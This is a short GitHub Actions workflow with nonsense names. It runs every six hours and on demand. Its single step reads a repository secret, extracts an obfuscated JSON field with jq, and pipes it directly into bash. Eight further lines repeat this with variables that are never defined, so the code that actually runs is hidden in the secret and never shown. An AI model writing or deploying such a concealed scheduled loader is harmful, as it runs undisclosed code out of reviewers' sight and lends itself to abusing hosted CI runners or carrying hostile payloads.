name: oiuajfnak
on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: oiuajfnak
        env:
          mz22: ${{ secrets.mz22 }}
        run: |
          echo $mz22 | jq -r .xpx023 | /bin/bash
          echo $qdhk09641 | jq -r .pmmmv0577 | /bin/bash
          echo $zgsyy41 | jq -r .dd26 | /bin/bash
          echo $smugz4494 | jq -r .zw1336 | /bin/bash
          echo $suj163 | jq -r .hrx98 | /bin/bash
          echo $mre7 | jq -r .c232 | /bin/bash
          echo $r71 | jq -r .zd963 | /bin/bash
          echo $ck178 | jq -r .wqzgo975 | /bin/bash
          echo $p69820 | jq -r .k03 | /bin/bash

